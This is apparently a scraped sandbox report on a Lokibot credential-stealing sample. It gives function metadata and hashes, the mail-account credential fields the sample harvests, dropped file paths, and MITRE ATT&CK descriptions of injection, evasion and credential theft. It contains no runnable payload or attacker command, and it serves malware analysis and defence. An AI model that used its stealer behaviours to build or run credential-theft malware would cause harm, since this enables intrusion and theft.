Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

SmtpServer, xrefs: 0040D0DC
Technology, xrefs: 0040D08D
SmtpAccount, xrefs: 0040D0FA
PopServer, xrefs: 0040D099
EmailAddress, xrefs: 0040D074
SmtpPassword, xrefs: 0040D117
PopAccount, xrefs: 0040D0B6
SmtpPort, xrefs: 0040D0EB
PopPassword, xrefs: 0040D0D0
PopPort, xrefs: 0040D0A7

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1e#U0414.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1e#U0414.exe.log

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
1e#U0414.exe

Function 032267A7 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 282
COMMON

Function 0322689E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 241
processCOMMON

Function 032268A8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 236
processCOMMON

Function 03226CE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118
COMMON

Function 03226F08 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 111
injectionCOMMON

Function 03226F10 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110
injectionCOMMON

Function 03226CF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100
COMMON

Function 03226BD8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
threadCOMMON

Function 03226E00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
memoryCOMMON

Function 03226E08 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95
memoryCOMMON

Function 03226BE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88
threadCOMMON

Function 03227048 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
threadCOMMON

Function 03227050 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
threadCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre